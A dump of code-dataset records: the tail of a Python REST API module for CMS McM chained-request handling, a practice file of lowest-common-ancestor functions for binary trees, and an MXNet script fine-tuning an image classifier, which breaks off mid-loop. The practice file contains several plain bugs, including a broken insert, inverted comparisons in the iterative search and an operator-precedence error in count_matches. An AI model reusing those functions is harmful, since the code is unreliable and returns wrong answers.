all_requests = rdb.get_all()\n searchable = {}\n for request in all_requests:\n for key in [\"prepid\", \"approval\", \"status\", \"pwg\", \"step\",\n \"last_status\", \"member_of_campaign\", \"dataset_name\"]:\n if key not in searchable:\n searchable[key] = set([])\n if not key in request:\n # that should make things break down, and due to schema evolution missed-migration\n continue\n if type(request[key]) == list:\n for item in request[key]:\n searchable[key].add(str(item))\n else:\n searchable[key].add(str(request[key]))\n\n # unique it\n for key in searchable:\n searchable[key] = list(searchable[key])\n searchable[key].sort()\n\n # store that value\n search = database('searchable')\n if search.document_exists('chained_requests'):\n search.delete('chained_requests')\n searchable.update({'_id': 'chained_requests'})\n search.save(searchable)\n searchable.pop('_id')\n return searchable\n else:\n # just retrieve that value\n search = database('searchable')\n searchable = search.get('chained_requests')\n searchable.pop('_id')\n searchable.pop('_rev')\n return searchable\n\n\nclass TestChainedRequest(RESTResource):\n\n access_limit = access_rights.generator_contact\n\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id):\n \"\"\"\n Perform test for chained requests\n \"\"\"\n crdb = database('chained_requests')\n rdb = database('requests')\n settingsDB = database('settings')\n mcm_cr = chained_request(crdb.get(chained_request_id))\n if settingsDB.get('validation_stop')['value']:\n return {\n \"results\": False,\n 'message': ('validation jobs are halted to allow forthcoming mcm ''restart - try again later'),\n \"prepid\": chained_request_id}\n requires_validation = False\n for rid in mcm_cr.get_attribute('chain')[mcm_cr.get_attribute('step'):]:\n mcm_r = request(rdb.get(rid))\n if not mcm_r.is_root and 'validation' not in mcm_r._json_base__status: # We dont care about non root request because they are not being used on chain run test\n break\n requires_validation = True\n if mcm_r.get_attribute('status') != 'new' or mcm_r.get_attribute('approval') != 'none':\n return {\n \"results\": False,\n \"prepid\": chained_request_id,\n \"message\": \"request %s is in status %s, approval: %s\" % (rid, mcm_r.get_attribute('status'), mcm_r.get_attribute('approval'))}\n try:\n mcm_r.ok_to_move_to_approval_validation(for_chain=True)\n mcm_r.update_history({'action': 'approve', 'step': 'validation'})\n mcm_r.set_attribute('approval', 'validation')\n mcm_r.reload()\n text = 'Within chain %s \\n' % mcm_cr.get_attribute('prepid')\n text += mcm_r.textified()\n subject = 'Approval %s in chain %s for request %s' % ('validation', mcm_cr.get_attribute('prepid'), mcm_r.get_attribute('prepid'))\n mcm_r.notify(subject, text, accumulate=True)\n except Exception as e:\n mcm_cr.reset_requests(str(e), notify_one=rid)\n return {\n \"results\": False,\n \"message\": str(e),\n \"prepid\": chained_request_id}\n if not requires_validation:\n return {\n \"results\": True,\n \"message\": \"No validation required\",\n \"prepid\": chained_request_id}\n mcm_cr.set_attribute('validate', 1)\n mcm_cr.update_history({'action': 'validate'})\n if not crdb.update(mcm_cr.json()):\n return {\n \"results\": False,\n \"message\": \"Failed while trying to update the document in DB\",\n \"prepid\": chained_request_id}\n return {\n \"results\": True,\n \"message\": \"run test will start soon\",\n \"prepid\": chained_request_id}\n\n\nclass SoftResetChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self, mode='show'):\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_id):\n \"\"\"\n Does a soft reset to all relevant request in the chain\n \"\"\"\n crdb = database('chained_requests')\n rdb = database('requests')\n\n mcm_cr = chained_request(crdb.get(chained_request_id))\n for rid in reversed(mcm_cr.get_attribute('chain')[:mcm_cr.get_attribute('step') + 1]):\n # from the current one to the first one REVERSED\n mcm_r = request(rdb.get(rid))\n try:\n mcm_r.reset(hard=False)\n except Exception as e:\n return {'prepid': chained_request_id, 'results': False, 'message': str(e)}\n\n mcm_r.reload()\n mcm_cr = chained_request(crdb.get(chained_request_id))\n mcm_cr.set_attribute('step', max(0, mcm_cr.get_attribute('chain').index(rid) - 1))\n mcm_cr.reload()\n\n return {'prepid': chained_request_id, 'results': True}\n\n\nclass InjectChainedRequest(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.before_request()\n self.count_call()\n self.mode = 'show' if 'get_inject' in flask.request.path else 'inject'\n\n def get(self, chained_request_id):\n \"\"\"\n Provides the injection command and does the injection.\n \"\"\"\n from tools.handlers import ChainRequestInjector, submit_pool\n\n _q_lock = locker.thread_lock(chained_request_id)\n if not locker.thread_acquire(chained_request_id, blocking=False):\n return {\"prepid\": chained_request_id, \"results\": False,\n \"message\": \"The request {0} request is being handled already\".format(\n chained_request_id)}\n\n thread = ChainRequestInjector(prepid=chained_request_id, lock=locker.lock(chained_request_id), queue_lock=_q_lock,\n check_approval=False)\n if self.mode == 'show':\n self.representations = {'text/plain': self.output_text}\n return thread.make_command()\n else:\n submit_pool.add_task(thread.internal_run)\n return {\n \"results\": True,\n \"message\": \"chain submission for %s will be forked unless same request is being handled already\" % chained_request_id,\n \"prepid\": chained_request_id}\n\n\nclass ChainsFromTicket(RESTResource):\n\n access_limit = access_rights.user\n\n def __init__(self):\n self.before_request()\n self.count_call()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('ticket', type=str, required=True)\n self.parser.add_argument('page', type=int, default=0)\n self.parser.add_argument('limit', type=int, default=20)\n\n def get(self):\n \"\"\"\n Get all the generated chains from a ticket\n \"\"\"\n kwargs = self.parser.parse_args()\n page = kwargs['page']\n limit = kwargs['limit']\n if page < 0:\n page = 0\n limit = 999999\n\n ticket_prepid = kwargs['ticket']\n chained_requests_db = database('chained_requests')\n mccms_db = database('mccms')\n result = mccms_db.search({'prepid': ticket_prepid}, page=-1)\n if len(result) == 0:\n self.logger.warning(\"Mccm prepid %s doesn't exit in db\" % ticket_prepid)\n return {}\n self.logger.info(\"Getting generated chains from ticket %s\" % ticket_prepid)\n generated_chains = list(result[0]['generated_chains'].iterkeys())\n generated_chains.sort()\n start = page * limit\n if start > len(generated_chains):\n return []\n end = start + limit\n end = end if end <= len(generated_chains) else len(generated_chains)\n chained_request_list = []\n while start < end:\n fetch_till = start + 20\n fetch_till = end if fetch_till > end else fetch_till\n chained_request_list += chained_requests_db.search({'prepid': generated_chains[start:fetch_till]})\n start += 20\n return chained_request_list\n\n\nclass TaskChainDict(RESTResource):\n\n access_limit = access_rights.user\n\n def __init__(self):\n self.before_request()\n self.count_call()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('scratch', type=str)\n self.parser.add_argument('upto', type=int)\n self.representations = {'text/plain': self.output_text}\n\n def get(self, chained_request_id):\n \"\"\"\n Provide the taskchain dictionnary for uploading to request manager\n \"\"\"\n kwargs = self.parser.parse_args()\n crdb = database('chained_requests')\n rdb = database('requests')\n settingsDB = database('settings')\n\n __DT_prio = settingsDB.get('datatier_input')[\"value\"]\n\n def tranform_to_step_chain(wma_dict, total_time_evt, total_size_evt):\n # replace Task -> Step in inside dictionaries\n for task_num in range(wma_dict[\"TaskChain\"]):\n for elem in wma_dict[\"Task%s\" % (task_num + 1)]:\n if \"Task\" in elem:\n wma_dict[\"Task%s\" % (task_num + 1)][elem.replace(\"Task\", \"Step\")] = wma_dict[\"Task%s\" % (task_num + 1)].pop(elem)\n\n # we later add the global fields\n del(wma_dict[\"Task%s\" % (task_num + 1)][\"TimePerEvent\"])\n del(wma_dict[\"Task%s\" % (task_num + 1)][\"SizePerEvent\"])\n\n # we do same replacement on top level\n for el in wma_dict:\n if wma_dict[el].__class__ == str and \"task\" in wma_dict[el]:\n wma_dict[el] = wma_dict[el].replace(\"task\", \"step\")\n\n if \"Task\" in el:\n wma_dict[el.replace(\"Task\", \"Step\")] = wma_dict.pop(el)\n\n wma_dict[\"RequestType\"] = \"StepChain\"\n\n # as of 2017-05 StepChain needs these as sum of internal Tasks\n wma_dict[\"TimePerEvent\"] = total_time_evt\n wma_dict[\"SizePerEvent\"] = total_size_evt\n\n return wma_dict\n\n if not crdb.document_exists(chained_request_id):\n # it's a request actually, pick up all chains containing it\n mcm_r = rdb.get(chained_request_id)\n mcm_crs = crdb.query_view('contains', chained_request_id, page_num=-1)\n task_name = 'task_' + chained_request_id\n else:\n mcm_crs = [crdb.get(chained_request_id)]\n # here name should be task_chain's[curr_step] request_prepid\n # so it would be task_prepid-of-current-request same as in top\n __req_id = mcm_crs[0]['chain'][mcm_crs[0]['step']]\n task_name = 'task_' + __req_id\n\n if len(mcm_crs) == 0:\n return {}\n\n tasktree = {}\n ignore_status = False\n __total_time_evt = 0\n __total_size_evt = 0\n\n if kwargs['scratch'] is not None:\n ignore_status = True\n\n veto_point = None\n if kwargs['upto'] is not None:\n veto_point = kwargs['upto']\n\n __chains_type = []\n for mcm_cr in mcm_crs:\n __chains_type.append(mcm_cr[\"chain_type\"])\n starting_point = mcm_cr['step']\n if ignore_status:\n starting_point = 0\n for (ir, r) in enumerate(mcm_cr['chain']):\n if (ir < starting_point):\n continue # ad no task for things before what is already done\n if veto_point and (ir > veto_point):\n continue\n mcm_r = request(rdb.get(r))\n if mcm_r.get_attribute('status') == 'done' and not ignore_status:\n continue\n\n if r not in tasktree:\n tasktree[r] = {'next': [], 'dict': [], 'rank': ir}\n\n base = ir == 0 and mcm_r.get_wmagent_type() in ['MonteCarlo', 'LHEStepZero']\n depend = (ir > starting_point) # all the ones later than the starting point depend on a previous task\n if ir < (len(mcm_cr['chain']) - 1):\n tasktree[r]['next'].append(mcm_cr['chain'][ir + 1])\n\n tasktree[r]['dict'] = mcm_r.request_to_tasks(base, depend)\n # if request is added to tasktree, we save global sums for StepChains\n __total_time_evt += mcm_r.get_sum_time_events()\n __total_size_evt += sum(mcm_r.get_attribute(\"size_event\"))\n\n for (r, item) in tasktree.items():\n # here we should generate unique list of steps+output tiers\n # as we iterate over requests in tasktree\n __uniq_tiers = []\n for el in item['dict']:\n # map of tiers and taskID in order of steps\n __uniq_tiers.append((el['TaskName'], el['_output_tiers_']))\n\n item['unique_tiers_'] = __uniq_tiers\n for n in item['next']:\n # here we should take input from datatier selection;\n # have a map of tiers -> taskNames and select appropriate one\n __input_tier = tasktree[n]['dict'][0]['_first_step_']\n tModule = tName = \"\"\n if __input_tier in __DT_prio:\n # in case there is a possible DataTier in global_dict\n tModule, tName = request.do_datatier_selection(__DT_prio[__input_tier], __uniq_tiers)\n\n if tModule != \"\" and tName != \"\":\n tasktree[n]['dict'][0].update({\"InputFromOutputModule\": tModule, \"InputTask\": tName})\n else:\n # default & fallback solution\n tasktree[n]['dict'][0].update({\"InputFromOutputModule\": item['dict'][-1]['output_'],\n \"InputTask\": item['dict'][-1]['TaskName']})\n\n wma = {\n \"RequestType\": \"TaskChain\",\n \"Group\": \"ppd\",\n \"Requestor\": \"pdmvserv\",\n \"TaskChain\": 0,\n \"ProcessingVersion\": 1,\n \"RequestPriority\": 0,\n \"SubRequestType\": \"MC\",\n # we default to 1 in multicore global\n \"Multicore\": 1}\n\n task = 1\n pilot_string = None\n for (r, item) in sorted(tasktree.items(), key=lambda d: d[1]['rank']):\n for d in item['dict']:\n if d['priority_'] > wma['RequestPriority']:\n wma['RequestPriority'] = d['priority_']\n if d['request_type_'] in ['ReDigi']:\n wma['SubRequestType'] = 'ReDigi'\n\n if d.get('pilot_'):\n pilot_string = d['pilot_']\n\n for k in d.keys():\n if k.endswith('_'):\n d.pop(k)\n wma['Task%d' % task] = d\n task += 1\n\n if pilot_string:\n wma['SubRequestType'] = pilot_string\n\n wma['TaskChain'] = task - 1\n if wma['TaskChain'] == 0:\n return dumps({})\n\n for item in ['CMSSWVersion', 'ScramArch', 'TimePerEvent', 'SizePerEvent', 'GlobalTag', 'Memory']:\n wma[item] = wma['Task%d' % wma['TaskChain']][item]\n\n # since 2016-11, processingString and AcquisitionEra is mandatory in global params\n wma['AcquisitionEra'] = wma['Task1']['AcquisitionEra']\n wma['ProcessingString'] = wma['Task1']['ProcessingString']\n wma['Campaign'] = wma['Task1']['Campaign']\n wma['PrepID'] = task_name\n wma['RequestString'] = wma['PrepID']\n if __chains_type.count(\"StepChain\") == len(__chains_type):\n return dumps(tranform_to_step_chain(wma, __total_time_evt, __total_size_evt), indent=4)\n else:\n return dumps(wma, indent=4)\n\n\nclass GetSetupForChains(RESTResource):\n\n access_limit = access_rights.user\n\n def __init__(self):\n path = flask.request.path\n if 'get_setup' in path:\n self.opt = 'setup'\n elif 'get_test' in path:\n self.opt = 'test'\n elif 'get_valid' in path:\n self.opt = 'valid'\n access_limit = access_rights.administrator\n else:\n raise Exception('Cannot create this resource with mode %s' % path)\n\n self.before_request()\n self.count_call()\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('scratch', type=str, default='')\n self.kwargs = self.parser.parse_args()\n self.representations = {'text/plain': self.output_text}\n\n def get(self, chained_request_id):\n \"\"\"\n Retrieve the script necessary to setup and test a given chained request\n get_setup - returns file for config generation for submission\n get_test - returns file for user validation\n get_valid - returns file for automatic validation\n \"\"\"\n crdb = database('chained_requests')\n if not crdb.document_exists(chained_request_id):\n return {\"results\": False,\n \"message\": \"Chained request with prepid {0} does not exist\".format(chained_request_id)}\n\n chained_req = chained_request(crdb.get(chained_request_id))\n from_scratch = self.kwargs.get('scratch', '').lower() == 'true'\n for_validation = self.opt in ('test', 'valid')\n automatic_validation = self.opt == 'valid'\n return chained_req.get_setup(for_validation=for_validation,\n automatic_validation=automatic_validation,\n scratch=from_scratch)\n\n\nclass ForceChainReqToDone(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.crdb = database('chained_requests')\n self.ldb = database('lists')\n self.before_request()\n self.count_call()\n self.representations = {'text/plain': self.output_text}\n\n def get(self, chained_request_ids):\n \"\"\"\n Force chained_request to set status to done\n \"\"\"\n if ',' in chained_request_ids:\n rlist = chained_request_ids.rsplit(',')\n res = []\n success = True\n for r in rlist:\n result = self.force_status_done(r)\n success = success and result.get('results', False)\n res.append(result)\n return dumps({'results': success, 'message': res}, indent=4)\n else:\n return dumps(self.force_status_done(chained_request_ids), indent=4)\n\n def force_status_done(self, prepid):\n if not self.crdb.document_exists(prepid):\n return dumps({\"results\": False, \"message\": \"Chained request with prepid {0} does not exist\".format(prepid)}, indent=4)\n cr = chained_request(self.crdb.get(prepid))\n if not (cr.get_attribute(\"status\") in [\"done\", \"force_done\"]):\n cr.set_status(to_status=\"force_done\")\n cr.remove_from_nonflowing_list()\n self.logger.debug(\"forcing chain_req status to done. cr status:%s\" % (cr.get_attribute(\"status\")))\n ret = self.crdb.save(cr.json())\n return {'prepid': prepid, 'message': ret, 'results': True}\n else:\n ret = \"Chained request already in status done\"\n return {'prepid': prepid, 'message': ret, 'results': False}\n\n\nclass ForceStatusDoneToProcessing(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.crdb = database('chained_requests')\n self.before_request()\n self.count_call()\n self.representations = {'text/plain': self.output_text}\n\n def get(self, chained_request_ids):\n \"\"\"\n Move chained_request from force_done to processing\n \"\"\"\n if ',' in chained_request_ids:\n rlist = chained_request_ids.rsplit(',')\n res = []\n success = True\n for r in rlist:\n result = self.force_status(r)\n success = success and result.get('results', False)\n res.append(result)\n return dumps({'results': success, 'message': res}, indent=4)\n else:\n return dumps(self.force_status(chained_request_ids), indent=4)\n\n def force_status(self, prepid):\n if not self.crdb.document_exists(prepid):\n return dumps({\"results\": False,\n \"message\": \"Chained request with prepid {0} does not exist\".format(prepid)})\n cr = chained_request(self.crdb.get(prepid))\n if cr.get_attribute(\"status\") == \"force_done\":\n cr.set_status(to_status=\"processing\")\n self.logger.debug(\"Moving chain_req back to satus 'processing'. cr status:%s\" % (\n cr.get_attribute(\"status\")))\n ret = self.crdb.save(cr.json())\n return {'prepid': prepid, 'message': ret, 'results': True}\n else:\n ret = \"Chained request already in status done\"\n return {'prepid': prepid, 'message': ret, 'results': False}\n\n\nclass ToForceFlowList(RESTResource):\n\n access_limit = access_rights.generator_contact\n\n def __init__(self):\n self.ldb = database('lists')\n self.cdb = database('chained_requests')\n self.before_request()\n self.count_call()\n\n def get(self, chained_request_ids):\n \"\"\"\n Add selected prepid's to global force complete list for later action\n \"\"\"\n if ',' in chained_request_ids:\n rlist = chained_request_ids.rsplit(',')\n else:\n rlist = [chained_request_ids]\n res = []\n __updated = False\n\n forceflow_list = self.ldb.get(\"list_of_forceflow\")\n # TO-DO check if prepid exists!\n # TO-DO check the status of chain_req!\n for el in rlist:\n if el not in forceflow_list[\"value\"]:\n forceflow_list[\"value\"].append(el)\n chain_req = chained_request(self.cdb.get(el))\n chain_req.update_history({'action': 'add_to_forceflow'})\n self.cdb.save(chain_req.json())\n res.append({\"prepid\": el, 'results': True, 'message': 'OK'})\n __updated = True\n else:\n res.append({\"prepid\": el, 'results': False, 'message': 'Chained request already in forceflow list'})\n\n # TO-DO check the update return value\n if __updated:\n self.ldb.update(forceflow_list)\n\n return res\n\n\nclass ChainedRequestsPriorityChange(RESTResource):\n\n access_limit = access_rights.production_manager\n\n def __init__(self):\n self.chained_requests_db = database(\"chained_requests\")\n self.before_request()\n self.count_call()\n\n def post(self):\n fails = []\n for chain in loads(flask.request.data):\n chain_prepid = chain['prepid']\n mcm_chained_request = chained_request(self.chained_requests_db.get(chain_prepid))\n action_parameters = chain['action_parameters']\n if not mcm_chained_request.set_priority(action_parameters['block_number']):\n message = 'Unable to set new priority in request %s' % chain_prepid\n fails.append(message)\n self.logger.error(message)\n else:\n mcm_chained_request.set_attribute('action_parameters', action_parameters)\n if not mcm_chained_request.save():\n message = 'Unable to save chained request %s' % chain_prepid\n fails.append(message)\n self.logger.error(message)\n return {\n 'results': True if len(fails) == 0 else False,\n 'message': fails}\n\n\nclass RemoveFromForceFlowList(RESTResource):\n\n access_limit = access_rights.generator_contact\n\n def __init__(self):\n self.ldb = database('lists')\n self.before_request()\n self.count_call()\n\n def delete(self, chained_request_ids):\n \"\"\"\n Remove selected prepid's from global force_complete list\n \"\"\"\n if ',' in chained_request_ids:\n rlist = chained_request_ids.rsplit(',')\n else:\n rlist = [chained_request_ids]\n res = []\n\n forceflow_list = self.ldb.get(\"list_of_forceflow\")\n for el in rlist:\n if el not in forceflow_list[\"value\"]:\n res.append({\"prepid\": el, 'results': False, 'message': 'Not in forceflow list'})\n else:\n forceflow_list[\"value\"].remove(el)\n res.append({\"prepid\": el, 'results': True, 'message': 'OK'})\n\n # TO-DO check the update return value\n ret = self.ldb.update(forceflow_list)\n\n return res\n\n\nclass GetUniqueChainedRequestValues(RESTResource):\n def __init__(self):\n self.before_request()\n self.count_call()\n\n def get(self, field_name):\n \"\"\"\n Get unique values for navigation by field_name\n \"\"\"\n args = flask.request.args.to_dict()\n db = database('requests')\n return {'results': db.query_unique(field_name,\n args.get('key', ''),\n int(args.get('limit', 10)))}\n","sub_path":"mcm/rest_api/ChainedRequestActions.py","file_name":"ChainedRequestActions.py","file_ext":"py","file_size_in_byte":45759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"570804709","text":"__author__ = 'Paul Tune'\n\nclass Tree(object):\n def __init__(self, key):\n self.key = key\n self.left = None\n self.right = None\n\n\ndef insert_bst(root, val):\n t = Tree(val)\n if root is None:\n return t\n\n if root.key > val:\n root = insert_bst(root.left)\n else:\n root = insert_bst(root.right)\n\n return root\n\n\ndef lowest_common_ancestor_bst(root, p, q):\n if root is None or p is None or q is None:\n return None\n\n if root.key > max(p.key, q.key):\n return lowest_common_ancestor_bst(root.left, p, q)\n elif root.key < min(p.key, q.key):\n return lowest_common_ancestor_bst(root.right, p, q)\n else:\n return root\n\n\ndef lowest_common_ancestor_bst_iterative(root, p, q):\n if p is None or q is None:\n return None\n\n curr = root\n while curr is not None:\n if curr.key < max(p.key, q.key):\n curr = curr.left\n elif curr.key > min(p.key, q.key):\n curr = curr.right\n else:\n return curr\n\n return curr\n\n\n# top down approach O(n^2)\ndef lowest_common_ancestor_top_down(root, p, q):\n if root is None or p is None or q is None:\n return None\n\n if root == p or root == q:\n return root\n\n total_matches = count_matches(root.left, p, q)\n if total_matches == 1:\n return root\n elif total_matches == 2:\n return lowest_common_ancestor_bst(root.left, p, q)\n else:\n return lowest_common_ancestor_bst(root.right, p, q)\n\n\n# returns number of nodes that matches p or q in the subtree\ndef count_matches(root, p, q):\n if root is None:\n return 0\n\n return count_matches(root.left, p, q) + count_matches(root.right, p, q) + \\\n 1 if root == p or root == q else 0\n\n\ndef lowest_common_ancestor_bottom_up(root, p, q):\n if root is None:\n return None\n\n if root == p or root == q:\n return root\n\n lft = lowest_common_ancestor_bottom_up(root.left, p, q)\n rgt = lowest_common_ancestor_bottom_up(root.right, p, q)\n if lft is not None and rgt is not None:\n return root\n return lft if lft is not None else rgt\n\n","sub_path":"practice/lowest_common_ancestor.py","file_name":"lowest_common_ancestor.py","file_ext":"py","file_size_in_byte":2137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"624637465","text":"#!/usr/bin/env python3\n\nfrom __future__ import print_function\nimport logging\n#import pdb\nimport os, sys\nimport time\nimport subprocess as sp\nimport argparse, pickle\nfrom common import util\nimport numpy as np\nfrom sklearn.metrics import roc_auc_score as auc_score, f1_score as f1, accuracy_score, precision_score, recall_score\nfrom sklearn.model_selection import train_test_split\nimport multiprocessing as mp\nimport mxnet as mx\nfrom mxnet import gluon, nd\nfrom mxnet.gluon import nn\nfrom mxnet.gluon.model_zoo import vision as models\nimport mxnet.autograd as autograd\nfrom mxnet.gluon import nn, Block, HybridBlock\n\n\ndef get_lr_scheduler(args):\n if 'lr_factor' not in args or args.lr_factor >= 1 or args.lr_step_epochs is None:\n print('Constant Learning Rate:%f' % args.lr)\n return None\n epoch_size = int(args.num_examples / args.batch_size )#* len(args.gpus.split(',')))\n begin_epoch = args.load_epoch if args.load_epoch else 0\n step_epochs = [int(l) for l in args.lr_step_epochs.split(',')]\n lr = args.lr\n for s in step_epochs:\n if begin_epoch >= s:\n lr *= args.lr_factor\n if lr != args.lr:\n logging.info('Adjust learning rate to %e for epoch %d' %(lr, begin_epoch))\n steps = [epoch_size * (x-begin_epoch) for x in step_epochs if x-begin_epoch > 0]\n print('LR steps: %s' % str(steps)) \n return mx.lr_scheduler.MultiFactorScheduler(step=steps, factor=args.lr_factor)\n \ndef add_data_args(parser):\n data = parser.add_argument_group('Data', 'the input images')\n data.add_argument('--data', type=str, help='the data', required=True)\n data.add_argument('--num-classes', type=int, default=2, help='the number of classes')\n data.add_argument('--num-examples', type=int, default=None, help='the number of training examples')\n data.add_argument('--crossvalid-fold', type=int, default=0, help='cross validation fold in [0,9]')\n data.add_argument('--val-size', type=int, default=512, help='size of validation set')\n return data\n \ndef add_data_aug_args(parser):\n aug = parser.add_argument_group('Image augmentations')\n aug.add_argument('--random-crop', type=int, default=0,\n help='if or not randomly crop the image')\n aug.add_argument('--random-mirror', type=int, default=0,\n help='if or not randomly flip horizontally')\n aug.add_argument('--max-random-aspect-ratio', type=float, default=0,\n help='max change of aspect ratio, whose range is [0, 1]')\n aug.add_argument('--max-random-rotate-angle', type=int, default=0,\n help='max angle to rotate, whose range is [0, 360]')\n aug.add_argument('--max-random-shear-ratio', type=float, default=0,\n help='max ratio to shear, whose range is [0, 1]')\n aug.add_argument('--max-random-scale', type=float, default=1,\n help='max ratio to scale')\n aug.add_argument('--min-random-scale', type=float, default=1,\n help='min ratio to scale, should >= img_size/input_shape. otherwise use --pad-size')\n return aug\n\ndef add_fit_args(parser):\n \"\"\"\n parser : argparse.ArgumentParser\n return a parser added with args required by fit\n \"\"\"\n train = parser.add_argument_group('Training', 'model training')\n train.add_argument('--gpus', type=str, default='0,1,2,3,4,5,6,7',\n help='list of gpus to run, e.g. 0 or 0,2,5. empty means using cpu')\n train.add_argument('--num-epochs', type=int, default=200,\n help='max num of epochs')\n train.add_argument('--lr', type=float, default=0.1,\n help='initial learning rate')\n train.add_argument('--lr-factor', type=float, default=0.1,\n help='the ratio to reduce lr on each step')\n train.add_argument('--lr-step-epochs', type=str,\n help='the epochs to reduce the lr, e.g. 30,60')\n train.add_argument('--model', type=str, required=True,\n help='pretrained model name') \n train.add_argument('--mom', type=float, default=0.9,\n help='momentum for sgd')\n train.add_argument('--wd', type=float, default=1e-4,\n help='weight decay for sgd')\n train.add_argument('--batch-size', type=int, default=256,\n help='the batch size')\n train.add_argument('--disp-batches', type=int, default=20,\n help='show progress for every n batches')\n train.add_argument('--model-pretrained', type=str, default=None,\n help='model pretained') \n train.add_argument('--model-save-prefix', type=str, default=None,\n help='model save prefix')\n train.add_argument('--load-epoch', type=int,\n help='load the model on an epoch using the model-load-prefix')\n train.add_argument('--save-all', type=int, default=0,\n help='save loss output, etc. after every epoch')\n \n return train\n \nparser = argparse.ArgumentParser(description=\"train phase2\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nadd_fit_args(parser)\nadd_data_args(parser)\nadd_data_aug_args(parser)\nargs = parser.parse_args()\n\nctx = [mx.gpu(int(i)) for i in args.gpus.split(',')]\n\nif args.model_save_prefix:\n model_save_path = os.path.join(args.model_save_prefix, util.getTimestamp())\n sp.call('mkdir -p ' + model_save_path, shell=True)\n log_filename = os.path.join(model_save_path, 'log_terminal.txt')\n tee = util.Tee(name=log_filename, mode='w')\n\nlogging.basicConfig(level=logging.INFO) \nlogging.info(' '.join(sys.argv))\nlogging.info(args)\n\nwith open(args.data, 'rb') as f:\n raw = pickle.load(f)\n\ntrain_image_size = int(raw['data'].shape[2] // 224 * 224)\naug_list=[]\nif args.random_mirror > 0:\n aug_list.append(mx.image.HorizontalFlipAug(0.5))\nif args.random_crop > 0:\n aug_list.append(mx.image.RandomSizedCropAug((train_image_size,train_image_size),\n min_area=0.4, ratio=(1,1), interp=10)) #.6\n\ndef aug(inputs):\n res=inputs\n for f in aug_list:\n res=f(res)\n return res\n\nraw_indices = list(range(raw['data'].shape[0]))\nlabel = (raw['label'] > 0).astype(np.float32)\nnp.random.seed(0)\nnp.random.shuffle(raw_indices)\n\nraw_indices = np.roll(raw_indices, -args.crossvalid_fold * args.val_size)\nindices_train, indices_val = raw_indices[args.val_size:], raw_indices[:args.val_size]\nargs.num_examples = len(indices_train)\ntrain_iter = gluon.data.DataLoader(\n gluon.data.ArrayDataset(raw['data'][indices_train], label[indices_train]), \n args.batch_size, shuffle=True, last_batch='rollover')\nval_iter = gluon.data.DataLoader(\n gluon.data.ArrayDataset(raw['data'][indices_val], label[indices_val]), \n args.batch_size, shuffle=False, last_batch='keep')\n\nval_uid = np.array(raw['uid'])[indices_val]\n\n############## model structure start ###########################\n\nget_model_func = eval('models.'+args.model)\nget_model_func_kwargs = dict(pretrained=True, ctx=ctx)\n \nif args.model.startswith('densenet'):\n get_model_func_kwargs.update(dropout=.2)\n\npretrained_model = get_model_func(**get_model_func_kwargs)\nfeatures = pretrained_model.features\nnew_features = nn.HybridSequential()\nnew_classifier = nn.HybridSequential()\n\nif args.model.startswith('resnet'):\n new_conv0_w = features[1].params.get('weight').data(ctx=ctx[0])[:,1:2].asnumpy()\n with new_features.name_scope():\n #new_features.add(gluon.nn.BatchNorm(in_channels=1))\n #new_features.add(ChannelWiseCenterNorm())\n new_features.add(gluon.nn.Conv2D(\n channels=new_conv0_w.shape[0],in_channels=1,\n kernel_size = new_conv0_w.shape[2:],\n strides=(2,2), padding=(3,3),use_bias=False))\n new_features[0].initialize(ctx=ctx) \n new_features[0].params.get('weight').set_data(new_conv0_w)\n [new_features.add(f) for f in features[2:]]\n \n with new_classifier.name_scope():\n for b in pretrained_model.classifier[:-1]:\n new_classifier.add(b)\n\nelif args.model.startswith('densenet'):\n new_conv0_w = features[0].params.get('weight').data(ctx=ctx[0])[:,1:2].asnumpy()\n with new_features.name_scope():\n #new_features.add(gluon.nn.BatchNorm(in_channels=1))\n #new_features[0].initialize(ctx=ctx)\n #new_features.add(ChannelWiseCenterNorm())\n new_features.add(gluon.nn.Conv2D(\n channels=new_conv0_w.shape[0],in_channels=1,\n kernel_size = new_conv0_w.shape[2:],\n strides=(2,2), padding=(3,3),use_bias=False)) \n new_features[0].initialize(ctx=ctx)\n new_features[0].params.get('weight').set_data(new_conv0_w)\n [new_features.add(f) for f in features[1:]]\n \n\nwith new_classifier.name_scope():\n new_classifier.add(nn.Dense(args.num_classes))\n new_classifier[-1].params.initialize(mx.init.Xavier(), ctx=ctx)\n\nnet = nn.HybridSequential()\nwith net.name_scope():\n #for f in new_features: net.add(f)\n #for f in new_classifier: net.add(f)\n #net.add(ChannelWiseCenterNorm())\n net.add(new_features)\n \n # load weights if provided\n if args.model_pretrained:\n net.collect_params().load(filename=args.model_pretrained, ctx=ctx, ignore_extra=True)\n net.add(new_classifier)\n net.hybridize()\n\n# return metrics string representation\ndef metric_str(names, accs):\n return ', '.join(['%s=%0.4f'%(name, acc) for name, acc in zip(names, accs)])\n\ndef evaluate(label, output):\n pred = np.argmax(output, axis=1)\n res = dict(acc=accuracy_score(y_true=label, y_pred=pred),\n pcs=precision_score(y_true=label, y_pred=pred),\n recall=recall_score(y_true=label, y_pred=pred),\n auc=auc_score(y_true=label, y_score=output[:,1]))\n return res#{ k:round(res[k] * 10000) / 10000. for k in res.keys()}\n\nloss = mx.gluon.loss.SoftmaxCrossEntropyLoss()\ntrainer = gluon.Trainer(net.collect_params(), 'adam',{'learning_rate': args.lr, 'wd':args.wd,'lr_scheduler':get_lr_scheduler(args)})\nbest_val_loss = 9999.\nbest_val_auc = 0.8\nbest_val_acc = 0.7\nfor epoch in range(args.num_epochs):\n # mxnet gluon save requires model has run forward before save.\n #if epoch==1:\n #net.export(os.path.join(model_save_path, 'model.json'))\n tic = time.time()\n \n train_epoch_outputs = []\n train_epoch_labels = []\n train_epoch_losses = []\n logging.info('[Epoch %d]' % epoch)\n ######## train #########\n for i, batch in enumerate(train_iter):\n if len(aug_list) > 0:\n train_batch_data = nd.transpose(batch[0], axes=(0,2,3,1))\n train_batch_data = 